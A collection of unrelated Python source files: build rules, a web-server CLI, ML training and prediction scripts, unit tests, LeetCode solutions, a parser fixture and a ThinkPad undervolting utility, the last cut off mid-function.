from pants.engine.unions import UnionMembership, UnionRule
from .target import NodeLibrary, NodeLibrarySources, NodeProjectFieldSet
from sendwave.pants_docker.docker_component import DockerComponent, DockerComponentFieldSet
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PackageFileRequest:
package_root: str
@rule
async def get_npm_package_files(request: PackageFileRequest) -> Digest:
project_root = PurePath(request.package_root)
package_json_path = project_root.joinpath("package.json")
package_lock = project_root.joinpath("package-lock.json")
yarn_lock = project_root.joinpath("yarn.lock")
npm_shrinkwrap = project_root.joinpath("npm-shrinkwrap.json")
rooted_configs = await Get(
Digest,
PathGlobs(
[
str(package_json_path),
str(package_lock),
str(yarn_lock),
str(npm_shrinkwrap),
]
),
)
unrooted_configs = await Get(Digest, RemovePrefix(rooted_configs, project_root))
return unrooted_configs
@dataclass(frozen=True)
class NodeSourceFilesRequest:
package_address: str
@rule
async def get_node_package_file_sources(
request: NodeSourceFilesRequest,
) -> StrippedSourceFiles:
transitive_targets = await Get(
TransitiveTargets, TransitiveTargetsRequest([request.package_address])
)
all_sources = [
t.get(NodeLibrarySources)
for t in transitive_targets.closure
if t.has_field(NodeLibrarySources)
]
source_files = await Get(StrippedSourceFiles, SourceFilesRequest(all_sources))
return source_files
@rule
async def get_node_package_digest(field_set: NodeProjectFieldSet) -> Digest:
artifact_paths = field_set.artifact_paths.value
package_files, source_files, nvm_bin = await MultiGet(
Get(Snapshot, PackageFileRequest(field_set.address.spec_path)),
Get(StrippedSourceFiles, NodeSourceFilesRequest(field_set.address)),
Get(Environment, EnvironmentRequest(["NVM_BIN"])),
)
build_context = await Get(
Snapshot, MergeDigests([source_files.snapshot.digest, package_files.digest])
)
search_path = []
if nvm_bin:
search_path.append(nvm_bin.get("NVM_BIN"))
search_path.extend(["/bin", "/usr/bin", "/usr/local/bin"])
npm_paths = await Get(
BinaryPaths,
BinaryPathRequest(
binary_name="npm",
search_path=search_path,
),
)
if not npm_paths.first_path:
raise ValueError("Could not find npm in path: {} cannot create package"
.format(":".join(search_path)))
npm_path = npm_paths.first_path.path
npm_install_result = await Get(
ProcessResult,
Process(
argv=[npm_paths.first_path.path, "install"],
output_directories=["./node_modules"],
input_digest=build_context.digest,
env={"PATH": ":".join(search_path)},
description="installing node project dependencies",
),
)
logger.debug(npm_install_result.stdout)
build_context = await Get(
Snapshot, MergeDigests([build_context.digest, npm_install_result.output_digest])
)
proc = await Get(
ProcessResult,
Process(
description="Running npm run-script pants:build",
argv=[npm_paths.first_path.path, "run-script", "pants:build"],
input_digest=build_context.digest,
output_directories=artifact_paths,
env={"PATH": ":".join(search_path)},
),
)
logger.debug(proc.stdout)
if field_set.output_path:
return await Get(Digest, AddPrefix(proc.output_digest, field_set.output_path.value))
return proc.output_digest
@rule
async def node_project_package(
field_set: NodeProjectFieldSet,
) -> BuiltPackage:
""""""
package = await Get(Snapshot, NodeProjectFieldSet, field_set)
return BuiltPackage(
digest=package.digest,
artifacts=tuple(BuiltPackageArtifact(f) for f in package.files),
)
@rule
async def node_project_docker(
field_set: NodeProjectFieldSet,
) -> DockerComponent:
""""""
package = await Get(Digest, NodeProjectFieldSet, field_set)
return DockerComponent(sources=package, commands=[])
def rules():
"""Return the pants rules for this module."""
return [
UnionRule(NodeProjectFieldSet, NodeProjectFieldSet),
UnionRule(DockerComponentFieldSet, NodeProjectFieldSet),
*collect_rules(),
]
|
import logging
import os
import threading
import webbrowser
from typing import Any, Dict, List
import toml
import typer
import uvicorn
from fps_uvicorn.config import UvicornConfig
from fps.config import Config
from fps.logging import configure_loggers, get_loggers_config
from fps.utils import merge_dicts
app = typer.Typer()
def parse_extra_options(options: List[str]) -> Dict[str, Any]:
def unnested_option(key: str, val: str, root: bool = True) -> Dict[str, Any]:
if "." in key:
k1, k2 = key.split(".", maxsplit=1)
if not k1 or not k2:
raise ValueError(f"Ill-formed option key '{key}'")
try:
return {k1: unnested_option(k2, val, False)}
except ValueError as e:
if root:
raise ValueError(f"Ill-formed option key '{key}'")
else:
raise e
else:
if root:
raise AttributeError(
f"Plugin option must be of the form '<plugin-name>.<option>', got '{key}'"
)
if "," in val:
if val.startswith("[") and val.endswith("]"):
return {key: [v.strip() for v in val[1:-1].split(",")]}
else:
return {key: [v.strip() for v in val.split(",")]}
else:
return {key: val}
formatted_options: Dict[str, Any] = {}
i = 0
while i < len(options):
opt = options[i]
# ill-formed extra config
if not opt.startswith("--"):
typer.echo(f"Optional config should start with '--', got '{opt}'")
raise typer.Abort()
if "=" in opt:
# option is --key=value
k, v = opt[2:].split("=", maxsplit=1)
merge_dicts(formatted_options, unnested_option(k, v))
else:
if i + 1 < len(options):
# option if a flag --key
if options[i + 1].startswith("--"):
merge_dicts(formatted_options, unnested_option(opt[2:], "true"))
# option is --key value
else:
merge_dicts(
formatted_options, unnested_option(opt[2:], options[i + 1])
)
i += 1
# option if a flag --key
else:
merge_dicts(formatted_options, unnested_option(opt[2:], "true"))
i += 1
return formatted_options
def store_extra_options(options: Dict[str, Any]):
if options:
opts = parse_extra_options(options)
f_name = "fps_cli_args.toml"
with open(f_name, "w") as f:
toml.dump(opts, f)
os.environ["FPS_CLI_CONFIG_FILE"] = f_name
@app.command(
context_settings={"allow_extra_args": True, "ignore_unknown_options": True}
)
def start(
ctx: typer.Context,
host: str = None,
port: int = None,
root_path: str = None,
reload: bool = typer.Option(
None,
help=(
"Enable/disable automatic reloading of the server when sources are modified"
),
),
reload_dirs: str = ".",
open_browser: bool = typer.Option(
None,
help=("Enable/disable automatic automatic opening of the browser"),
),
config: str = None,
workers: int = None,
):
logger = logging.getLogger("fps")
if config:
if os.path.isfile(config):
os.environ["FPS_EXTRA_CONFIG_FILE"] = config
else:
logger.error(f"Invalid configuration file '{config}'")
exit(1)
store_extra_options(ctx.args)
Config.register("uvicorn", UvicornConfig)
config = Config(UvicornConfig)
host = host or config.host
port = port or config.port
root_path = root_path or config.root_path
reload = reload if reload is not None else config.reload
open_browser = open_browser if open_browser is not None else config.open_browser
workers = workers or config.workers
if open_browser:
threading.Thread(target=launch_browser, args=(host, port), daemon=True).start()
configure_loggers(("uvicorn", "uvicorn.access", "uvicorn.error"))
uvicorn.run(
"fps.main:app",
host=host,
port=port,
root_path=root_path,
workers=workers,
log_config=get_loggers_config(),
reload=reload,
reload_dirs=reload_dirs,
)
def launch_browser(host: str, port: int):
webbrowser.open_new(f"{host}:{port}")
|
#!/usr/bin/env python3
# Copyright 2017 Jian Wang
# License: Apache 2.0.
import os
import argparse
import sys
sys.stdout = open(1, 'w', encoding='latin-1', closefd=False)
import re
tab_or_space = re.compile('[ \t]+')
parser = argparse.ArgumentParser(description="This script get a vocab from unigram counts "
"of words produced by get_unigram_counts.sh",
epilog="E.g. " + sys.argv[0] + " data/rnnlm/data > data/rnnlm/vocab/words.txt",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("data_dir",
help="Directory in which to look for unigram counts.")
args = parser.parse_args()
eos_symbol = '</s>'
special_symbols = ['<s>', '<brk>', '<eps>']
# Add the count for every word in counts_file
# the result is written into word_counts
def add_counts(word_counts, counts_file):
with open(counts_file, 'r', encoding="latin-1") as f:
for line in f:
line = line.strip(" \t\r\n")
word_and_count = re.split(tab_or_space, line)
assert len(word_and_count) == 2
if word_and_count[0] in word_counts:
word_counts[word_and_count[0]] += int(word_and_count[1])
else:
word_counts[word_and_count[0]] = int(word_and_count[1])
word_counts = {}
for f in os.listdir(args.data_dir):
full_path = args.data_dir + "/" + f
if os.path.isdir(full_path):
continue
if f.endswith(".counts"):
add_counts(word_counts, full_path)
if len(word_counts) == 0:
sys.exit(sys.argv[0] + ": Directory {0} should contain at least one .counts file "
.format(args.data_dir))
print("<eps> 0")
print("<s> 1")
print("</s> 2")
print("<brk> 3")
idx = 4
for word, _ in sorted(word_counts.items(), key=lambda x: x[1], reverse=True):
if word == "</s>":
continue
print("{0} {1}".format(word, idx))
idx += 1
print(sys.argv[0] + ": vocab is generated with {0} words.".format(idx), file=sys.stderr)
|
import os
import pytest
from datadog_checks.dev import docker_run
from .common import INSTANCES
HERE = os.path.dirname(os.path.abspath(__file__))
DOCKER_DIR = os.path.join(HERE, 'docker')
@pytest.fixture(scope='session', autouse=True)
def dd_environment():
flavor = os.getenv('FLAVOR', 'default')
instance = INSTANCES['main']
with docker_run(
os.path.join(DOCKER_DIR, flavor, 'docker-compose.yaml'),
build=True,
endpoints=instance['stats_url']
):
yield instance
|
from ..api import get_many, ApiVersion, int_field, date_field
from datetime import date
from typing import Iterator, List, Optional
class OckovaniDistribuceSklad:
""" Přehled distribuce očkovacích látek v ČR z centrálního skladu
Datová sada obsahuje přehled distribuce očkovacích látek proti onemocnění COVID-19 v rámci
centrálního skladu (příjem na centrální skladu a výdej do očkovacích míst v ČR). Každý záznam
(řádek) datové sady udává počet ampulek dané očkovací látky, která byla daným očkovacím místem v
daný den přijata nebo vydána.
Attributes
----------
datum: date
Datum, kdy byla akce (distribuční záznam) uživatelem zadána do systému.
akce: str
Příznak, zda se jedná o příjem na sklad (objednané nebo již přijaté dodávky na centrálním
skladě, příznak vždy neznamená, že se jedná o naskladněnou dodávku, může jít o dodávku
objednanou) nebo výdej z centrálního skladu na poskytovatele zdravotních služeb (dle
Národního registru poskytovatelů zdravotních služeb - NRPZS), případně je možné specifikovat
přímo očkovací místo. Atribut nrpzs_kod a nrpzs_nazev jsou při výdeji povinné, atributy
ockovaci_misto_id a ockovaci_misto_nazev jsou povinné pouze v případě, pokud je daný
poskytovatel současně očkovacím místem.
vyrobce: str
Název výrobce distribuované očkovací látky.
pocet_ampulek: int
Počet ampulek, které byly součástí akce (distribučního záznamu), tedy příjem nebo výdej
(Comirnaty (Pfizer) = 6 dávek / ampulka, VAXZEVRIA = 10 dávek / ampulka, Spikevax (Moderna)
= 10 dávek / ampulka, COVID-19 Vaccine Janssen = 5 dávek / ampulka).
nrpzs_kod: str
Identifikátor poskytovatele zdravotních služeb dle registru NRPZS.
nrpzs_nazev: str
Název poskytovatele zdravotních služeb dle registru NRPZS.
nrpzs_kraj_nazev: str
Název kraje pro sídlo poskytovatele zdravotních služeb dle registru NRPZS.
ockovaci_misto_id: str
Jednoznačný identifikátor očkovacího místa.
ockovaci_misto_nazev: str
Název očkovacího místa.
distribuce_id: str
Identifikátor akce (distribučního záznamu), který umožňuje sprárování s datovou sadou o
distribuci očkovacích látek mezi očkovacími místy.
"""
def __init__(self, line: List[str]) :
self.datum: Optional[date] = date_field(line[0])
self.akce: str = line[1]
self.vyrobce: str = line[2]
self.pocet_ampulek: int = int_field(line[3])
self.nrpzs_kod: str = line[4]
self.nrpzs_nazev: str = line[5]
self.nrpzs_kraj_nazev: str = line[6]
self.ockovaci_misto_id: str = line[7]
self.ockovaci_misto_nazev: str = line[8]
self.distribuce_id: str = line[9]
@staticmethod
def get(cache_dir: Optional[str]) -> Iterator['OckovaniDistribuceSklad'] :
return get_many('ockovani-distribuce-sklad',
OckovaniDistribuceSklad,
ApiVersion.V2,
cache_dir)
|
from sklearn.utils import all_estimators
from sklearn.utils.estimator_checks import _construct_instance
from sklearn.utils._testing import SkipTest
from docutils import nodes
from contextlib import suppress
from docutils.parsers.rst import Directive
class AllowNanEstimators(Directive):
@staticmethod
def make_paragraph_for_estimator_type(estimator_type):
intro = nodes.list_item()
intro += nodes.strong(text="Estimators that allow NaN values for type ")
intro += nodes.literal(text=f"{estimator_type}")
intro += nodes.strong(text=":\n")
exists = False
lst = nodes.bullet_list()
for name, est_class in all_estimators(type_filter=estimator_type):
with suppress(SkipTest):
est = _construct_instance(est_class)
if est._get_tags().get("allow_nan"):
module_name = ".".join(est_class.__module__.split(".")[:2])
class_title = f"{est_class.__name__}"
class_url = f"./generated/{module_name}.{class_title}.html"
item = nodes.list_item()
para = nodes.paragraph()
para += nodes.reference(
class_title, text=class_title, internal=False, refuri=class_url
)
exists = True
item += para
lst += item
intro += lst
return [intro] if exists else None
def run(self):
lst = nodes.bullet_list()
for i in ["cluster", "regressor", "classifier", "transformer"]:
item = self.make_paragraph_for_estimator_type(i)
if item is not None:
lst += item
return [lst]
def setup(app):
app.add_directive("allow_nan_estimators", AllowNanEstimators)
return {
"version": "0.1",
"parallel_read_safe": True,
"parallel_write_safe": True,
}
|
# --------------
import pandas as pd
from sklearn.model_selection import train_test_split
#path - Path of file
# Code starts here
df=pd.read_csv(path)
X=df.drop(['customerID','Churn'], 1).copy()
y=df.Churn
X_train,X_test,y_train,y_test=train_test_split(X, y, test_size = 0.3, random_state = 0)
# --------------
import numpy as np
from sklearn.preprocessing import LabelEncoder
# Code starts here
X_train['TotalCharges']=X_train.TotalCharges.replace(' ', np.NaN).astype(float)
X_test['TotalCharges']=X_test.TotalCharges.replace(' ', np.NaN).astype(float)
X_train['TotalCharges']=X_train.TotalCharges.fillna(X_train.TotalCharges.mean())
X_test['TotalCharges']=X_test.TotalCharges.fillna(X_test.TotalCharges.mean())
X_train.isna().sum()
lb=LabelEncoder()
for col in list(X_train.select_dtypes(include=object).columns):
X_train[col]=lb.fit_transform(X_train[col])
for col in list(X_test.select_dtypes(include=object).columns):
X_test[col]=lb.fit_transform(X_test[col])
y_train=y_train.replace({'No':0, 'Yes':1})
y_test=y_test.replace({'No':0, 'Yes':1})
# --------------
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score,classification_report,confusion_matrix
# Code starts here
print(X_train.head(3), '\n', X_test.head(3), '\n', y_train.head(3), '\n', y_test.head(3))
ada_model=AdaBoostClassifier(random_state=0)
ada_model.fit(X_train, y_train)
y_pred=ada_model.predict(X_test)
ada_score=accuracy_score(y_test, y_pred)
ada_cm=confusion_matrix(y_test, y_pred)
ada_cr=classification_report(y_test, y_pred)
print(ada_cm, '\n', ada_cr, '\n', ada_score)
# --------------
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
#Parameter list
parameters={'learning_rate':[0.1,0.15,0.2,0.25,0.3],
'max_depth':range(1,3)}
# Code starts here
xgb_model=XGBClassifier(random_state=0)
xgb_model.fit(X_train, y_train)
y_pred=xgb_model.predict(X_test)
xgb_score=accuracy_score(y_test, y_pred)
xgb_cm=confusion_matrix(y_test, y_pred)
xgb_cr=classification_report(y_test, y_pred)
print('the results for XGB are:', xgb_cm, '\n', xgb_cr, '\n', xgb_score)
clf_model=GridSearchCV(estimator=xgb_model, param_grid=parameters)
clf_model.fit(X_train, y_train)
y_pred=clf_model.predict(X_test)
clf_score=accuracy_score(y_test, y_pred)
clf_cm=confusion_matrix(y_test, y_pred)
clf_cr=classification_report(y_test, y_pred)
print('the results for grid search are:', clf_cm, '\n', clf_cr, '\n', clf_score)
|
from unet3d.config import load_config
import os
import torch
import torch.nn as nn
import datetime
from datasets.hdf5 import BratsDataset
from unet3d.model import get_model
from unet3d import utils
from tensorboardX import SummaryWriter
from visualization import board_add_images, board_add_image
def get_job_name():
now = '{:%Y-%m-%d.%H:%M}'.format(datetime.datetime.now())
return "%s_model" % (now)
logger = utils.get_logger('UNet3DPredictor')
# Load and log experiment configuration
config = load_config()
# Load model state
model = get_model(config)
model_path = config['trainer']['test_model']
logger.info(f'Loading model from {model_path}...')
utils.load_checkpoint(model_path, model)
logger.info(f"Sending the model to '{config['default_device']}'")
model = model.to('cuda:0')
predictionsBasePath = config['loaders']['pred_path']
BRATS_VAL_PATH = config['loaders']['test_path']
challengeValset = BratsDataset(BRATS_VAL_PATH[0], mode="validation", hasMasks=False, returnOffsets=True)
challengeValloader = torch.utils.data.DataLoader(challengeValset, batch_size=1, shuffle=False, pin_memory=True, num_workers=1)
writer = SummaryWriter(logdir=os.path.join(predictionsBasePath[0], get_job_name()))
def makePredictions():
# model is already loaded from disk by constructor
basePath = os.path.join(predictionsBasePath[0])
if not os.path.exists(basePath):
os.makedirs(basePath)
with torch.no_grad():
for i, data in enumerate(challengeValloader):
inputs, pids, xOffset, yOffset, zOffset = data
print('***********************************')
print("processing {}".format(pids[0]))
inputs = inputs.to('cuda:0')
# predict labels and bring into required shape
outputs = model(inputs)
outputs = outputs[:, :, :, :, :155]
# visualize the feature map to tensorboard
# input_list = [inputs[0:1, 0:1, :, :, 64], inputs[0:1, 1:2, :, :, 64], inputs[0:1, 2:3, :, :, 64],
# inputs[0:1, 3:4, :, :, 64]]
max = inputs.max()
min = inputs.min()
print(f'max:{max} min:{min}')
print('***********************************')
Flair = [inputs[0:1, 0:1, :, :, 64]]
T1 = [inputs[0:1, 1:2, :, :, 64]]
T1ce = [inputs[0:1, 2:3, :, :, 64]]
T2 = [inputs[0:1, 3:4, :, :, 64]]
pred_list = [outputs[0:1, :, :, :, 64]]
board_add_images(writer, f'{pids[0]}/Flair', Flair, 0)
board_add_images(writer, f'{pids[0]}/T1', T1, 0)
board_add_images(writer, f'{pids[0]}/T1ce', T1ce, 0)
board_add_images(writer, f'{pids[0]}/T2', T2, 0)
board_add_images(writer, f'{pids[0]}/pred', pred_list, 0)
s = outputs.shape
fullsize = outputs.new_zeros((s[0], s[1], 240, 240, 155))
if xOffset + s[2] > 240:
outputs = outputs[:, :, :240 - xOffset, :, :]
if yOffset + s[3] > 240:
outputs = outputs[:, :, :, :240 - yOffset, :]
if zOffset + s[4] > 155:
outputs = outputs[:, :, :, :, :155 - zOffset]
fullsize[:, :, xOffset:xOffset + s[2], yOffset:yOffset + s[3], zOffset:zOffset + s[4]] = outputs
# binarize output
wt, tc, et = fullsize.chunk(3, dim=1)
s = fullsize.shape
wt = (wt > 0.6).view(s[2], s[3], s[4])
tc = (tc > 0.5).view(s[2], s[3], s[4])
et = (et > 0.7).view(s[2], s[3], s[4])
result = fullsize.new_zeros((s[2], s[3], s[4]), dtype=torch.uint8)
result[wt] = 2
result[tc] = 1
result[et] = 4
npResult = result.cpu().numpy()
max = npResult.max()
min = npResult.min()
path = os.path.join(basePath, "{}.nii.gz".format(pids[0]))
utils.save_nii(path, npResult, None, None)
print("Done :)")
if __name__ == "__main__":
makePredictions() |
import mock
import unittest
from tests.tests_data import fake_talk_json
from tests.tests_data import fake_empty_talk_json
from worker.api import API
def mocked_requests_get(*args, **kwargs):
class MockResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return self.json_data
result = MockResponse(fake_talk_json, 200)
return result
def mocked_requests_get_fails(*args, **kwargs):
class MockResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return self.json_data
result = MockResponse(fake_empty_talk_json, 500)
return result
class APITest(unittest.TestCase):
@mock.patch('requests.get', side_effect=mocked_requests_get)
def test_get_random_talk(self, mock_get):
api = API()
talk_json = api.get_random_talk()
self.assertIsNotNone(talk_json)
self.assertIsInstance(talk_json, dict)
@mock.patch('requests.get', side_effect=mocked_requests_get_fails)
def test_get_random_talk_fails(self, mock_get):
api = API()
talk_json = api.get_random_talk()
self.assertIsNone(talk_json)
|
from __future__ import print_function, division
from evoltier.optimizer import Optimizer
from evoltier.model.bernoulli import Bernoulli
class BernoulliNaturalGradientOptimizer(Optimizer):
def __init__(self, weight_function, lr, distribution=None, dim=None):
if dim is None and distribution is None:
print('Need to set argument "dim" or "distribution"')
raise
dist = distribution if distribution is not None else Bernoulli(dim=dim)
super(BernoulliNaturalGradientOptimizer, self).__init__(dist, weight_function, lr)
def update(self, evals, sample):
self.t += 1
weights = self.w_func(evals, xp=self.target.xp)
self.lr.set_parameters(weights, xp=self.target.xp)
grad_theta = self.compute_natural_grad(weights, sample, self.target.theta)
self.target.theta += self.lr.eta * grad_theta
def compute_natural_grad(self, weights, sample, theta):
xp = self.target.xp
grad_theta = xp.sum(weights[:, None] * (sample - theta), axis=0)
return grad_theta
def get_info_dict(self):
info = {'LearningRate': self.lr.eta}
return info
def generate_header(self):
header = ['LearningRate']
return header
|
# 802.1X Authentication
|
class Solution:
def mergeAlternately(self, word1: str, word2: str) -> str:
x=""
k=0
while k<(min(len(word1),len(word2))):
x+=word1[k]+word2[k]
k+=1
if word1:
x+=word1[len(word2):]
if word2:
x+=word2[len(word1):]
return x
|
expected_output = {
"acl": {
"acl_name": {"total_aces_configured": 1},
"ipv4_ext": {"total_aces_configured": 0},
},
"attachment_points": {
"Ethernet1/1": {
"egress": {
"ipv4_acl": {
"total_aces_configured": 3,
"active": True,
"name": "ipv4_acl",
"type": "Router ACL",
},
"ipv6_acl2": {
"total_aces_configured": 1,
"active": True,
"name": "ipv6_acl2",
"type": "Router ACL",
},
},
"ingress": {
"ipv6_acl": {
"total_aces_configured": 3,
"active": True,
"name": "ipv6_acl",
"type": "Router ACL",
},
"mac_acl": {
"total_aces_configured": 5,
"active": True,
"name": "mac_acl",
"type": "Port ACL",
},
"test22": {
"total_aces_configured": 3,
"active": True,
"name": "test22",
"type": "Router ACL",
},
},
"interface_id": "Ethernet1/1",
}
},
}
|
"""
# Definition for a Node.
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children if children is not None else []
"""
class Solution:
def findRoot(self, tree: List['Node']) -> 'Node':
node_indegree = {}
for node in tree:
if node not in node_indegree:
node_indegree[node] = 0
for child in node.children:
node_indegree[child] = 1
for node, indegree in node_indegree.items():
if indegree == 0:
return node
class SolutionSet:
def findRoot(self, tree: List['Node']) -> 'Node':
seen = set()
for node in tree:
for child in node.children:
seen.add(child.val)
for node in tree:
if node.val not in seen:
return node
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import boto3
import inspect
import os
import tensorflow as tf
from tf_container.run import logger
import tf_container.s3_fs as s3_fs
class Trainer(object):
DEFAULT_TRAINING_CHANNEL = 'training'
def __init__(self,
customer_script,
current_host,
hosts,
train_steps=1000,
eval_steps=100,
input_channels=None,
model_path=None,
output_path=None,
customer_params={},
save_checkpoints_secs=300):
"""
Args:
customer_script: (module) Customer loaded module
current_host: (str) Current hostname
hosts: list (str) List with all containers list names
train_steps: (int) Perform this many steps of training. 'None', the default,
means train forever.
eval_steps: (int) 'evaluate' runs until input is exhausted (or another exception
is raised), or for 'eval_steps' steps, if specified.
input_channels: (dict) Dictionary with input channels
model_path: (str) Directory where checkpoints will be saved. Can be a S3 bucket
output_path: (str) Local directory where the model will be saved
"""
self.customer_script = customer_script
self.current_host = current_host
self.hosts = hosts
self.train_steps = train_steps
self.eval_steps = eval_steps
self.input_channels = input_channels
self.model_path = model_path
self.ouput_path = output_path
self.task_type = None
customer_params['save_checkpoints_secs'] = customer_params.get('save_checkpoints_secs', save_checkpoints_secs)
self.customer_params = customer_params
if model_path.startswith('s3://'):
s3_fs.configure_s3_fs(model_path)
def train(self):
run_config = self._build_run_config()
estimator = self._build_estimator(run_config=run_config)
train_spec = self._build_train_spec()
eval_spec = self._build_eval_spec()
tf.estimator.train_and_evaluate(estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
return estimator
def _build_run_config(self):
valid_runconfig_keys = ['save_summary_steps', 'save_checkpoints_secs', 'save_checkpoints_steps',
'keep_checkpoint_max', 'keep_checkpoint_every_n_hours', 'log_step_count_steps']
runconfig_params = {k: v for k, v in self.customer_params.items() if k in valid_runconfig_keys}
logger.info('creating RunConfig:')
logger.info(runconfig_params)
run_config = tf.estimator.RunConfig(model_dir=self.model_path, **runconfig_params)
return run_config
def _build_estimator(self, run_config):
hyperparameters = self.customer_params
if hasattr(self.customer_script, 'estimator_fn'):
logger.info('invoking the user-provided estimator_fn')
return self.customer_script.estimator_fn(run_config, hyperparameters)
elif hasattr(self.customer_script, 'keras_model_fn'):
logger.info('invoking the user-provided keras_model_fn')
model = self.customer_script.keras_model_fn(hyperparameters)
return tf.keras.estimator.model_to_estimator(keras_model=model, config=run_config)
else:
logger.info('creating an estimator from the user-provided model_fn')
# We must wrap the model_fn from customer_script like this to maintain compatibility with our
# existing behavior, which passes arguments to the customer model_fn positionally, not by name.
# The TensorFlow Estimator checks the signature of the given model_fn for a parameter named "params":
# https://github.com/tensorflow/tensorflow/blob/2c9a67ffb384a13cd533a0e89a96211058fa2631/tensorflow/python/estimator/estimator.py#L1215
# Wrapping it in _model_fn allows the customer to use whatever parameter names they want. It's unclear whether
# this behavior is desirable theoretically, but we shouldn't break existing behavior.
def _model_fn(features, labels, mode, params):
return self.customer_script.model_fn(features, labels, mode, params)
return tf.estimator.Estimator(
model_fn=_model_fn,
params=hyperparameters,
config=run_config)
def _build_train_spec(self):
invoke_args = self._resolve_input_fn_args(self.customer_script.train_input_fn)
train_input_fn = lambda: self.customer_script.train_input_fn(**invoke_args)
return tf.estimator.TrainSpec(train_input_fn, max_steps=self.train_steps)
def saves_training(self):
return hasattr(self.customer_script, 'serving_input_fn')
def _build_eval_spec(self):
invoke_args = self._resolve_input_fn_args(self.customer_script.eval_input_fn)
eval_input_fn = lambda: self.customer_script.eval_input_fn(**invoke_args)
if self.saves_training():
serving_input_receiver_fn = lambda: self.customer_script.serving_input_fn(self.customer_params)
exporter = tf.estimator.LatestExporter('Servo',
serving_input_receiver_fn=serving_input_receiver_fn)
else:
logger.warn('serving_input_fn not specified, model NOT saved, use checkpoints to reconstruct')
exporter = None
valid_eval_keys = ['start_delay_secs', 'throttle_secs']
eval_params = {k: v for k, v in self.customer_params.items() if k in valid_eval_keys}
return tf.estimator.EvalSpec(eval_input_fn, steps=self.eval_steps, exporters=exporter, **eval_params)
def _resolve_input_fn_args(self, customer_fn):
declared_args = inspect.getargspec(customer_fn)
return {arg: self._resolve_input_fn_param_value(arg) for arg in declared_args.args}
def _resolve_input_fn_param_value(self, alias_key):
"""
Handle potentially aliased key name and return value for valid one.
:return: value for the requested parameter or None
"""
key_mappings = {('training_dir', 'dir'): 'training_dir',
('hyperparameters', 'params'): 'hyperparameters',
('input_channels', 'channels'): 'input_channels'}
resolved_key = None
for k, v in key_mappings.items():
if alias_key in k:
resolved_key = v
break
parameter_values = {'training_dir': self.input_channels.get(self.DEFAULT_TRAINING_CHANNEL, None),
'hyperparameters': self.customer_params,
'input_channels': self.input_channels}
return parameter_values[resolved_key] if resolved_key else None
def build_tf_config(self):
"""Builds a dictionary containing cluster information based on number of hosts and number of parameter servers.
More information about TF_Config: https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/learn
/python/learn/estimators/run_config.py#L77
:return: task_type and tf_config dictionary
"""
masters = self.hosts[:1]
workers = self.hosts[1:]
ps = self.hosts[:] if len(self.hosts) > 1 else None
self.task_type = self._get_task_type(masters)
task_map = {'master': masters, 'worker': workers}
if ps:
task_map['ps'] = ps
task_id = task_map[self.task_type].index(self.current_host)
def build_host_addresses(my_hosts, port='2222'):
return ['{}:{}'.format(host, port) for host in my_hosts]
tf_config = {
'cluster': {
'master': build_host_addresses(masters),
},
'task': {
'index': task_id,
'type': self.task_type
},
'environment': 'cloud'
}
if ps:
tf_config['cluster']['ps'] = build_host_addresses(ps, port='2223')
if len(workers) > 0:
tf_config['cluster']['worker'] = build_host_addresses(workers)
return tf_config
def _get_task_type(self, masters):
if self.current_host in masters:
return 'master'
return 'worker'
|
# undervolt.py
"""
Undervolt related stuff
"""
import os
import sys
import pathlib
import argparse
import thinkpad_tools_assets.classes
from thinkpad_tools_assets.utils import ApplyValueFailedException, NotSudo
try:
if os.getuid() != 0:
raise NotSudo("Script must be run as superuser/sudo")
except NotSudo:
print("ERROR: This script must be run as superuser/sudo")
sys.exit(1)
# PLANE KEY:
# Plane 0: Core
# Plane 1: GPU
# Plane 2: Cache
# Plane 3: Uncore
# Plane 4: Analogio
STATUS_TEXT = '''\
Current status:
Core: {core}\n
GPU: {gpu}\n
Cache: {cache}\n
Uncore: {uncore}\n
Analogio: {analogio}\n
'''
USAGE_HEAD: str = '''\
thinkpad-tools undervolt <verb> [argument]
Supported verbs are:
status Print all properties
set-<property> Set value
get-<property> Get property
Available properties: core, gpu, cache, uncore, analogio
'''
USAGE_EXAMPLES: str = '''\
Examples:
thinkpad-tools trackpoint status
thinkpad-tools trackpoint set-core -20
thinkpad-tools trackpoint get-gpu
'''
class Undervolt(object):
"""
Class to handle requests related to Undervolting
"""
def __init__(
self,
core: float or None = None,
gpu: float or None = None,
cache: float or None = None,
uncore: float or None = None,
analogio: float or None = None,
):
# self.__register: str = "0x150"
# self.__undervolt_value: str = "0x80000"
self.core = core
self.gpu = gpu
self.cache = cache
self.uncore = uncore
self.analogio = analogio
def read_values(self):
"""
Read values from the system
:return: Nothing
"""
success = True
failures: list = list()
system = thinkpad_tools_assets.classes.UndervoltSystem()
for prop in self.__dict__.keys():
plane_hashmap = {"core": 0, "gpu": 1, "cache": 2, "uncore": 3, "analogio": 4}
h: str = ''
try:
plane = plane_hashmap[prop]
h = system.readUndervolt(plane)
except Exception as e:
success = False
failures.append(str(e))
self.__dict__[prop] = h
if not success:
raise ApplyValueFailedException(', '.join(failures))
def set_values(self):
"""
Set values to the system MSR using undervolt function
:return: Nothing
"""
system = thinkpad_tools_assets.classes.UndervoltSystem()
success: bool = True
failures: list = list()
plane_hashmap = {"core": 0, "gpu": 1, "cache": 2, "uncore": 3, "analogio": 4}
for prop in self.__dict__.keys():
if self.__dict__[prop] is None:
continue
try:
plane: int = plane_hashmap[prop]
system.applyUndervolt(int(self.__dict__[prop]), plane)
except Exception as e:
success = False
failures.append(str(e))
if not success:
raise ApplyValueFailedException(', '.join(failures))
def get_status_str(self) -> str:
"""
Return status string
:return: str: status string
"""
return STATUS_TEXT.format(
core=self.core,
gpu=self.gpu,
cache=self.cache,
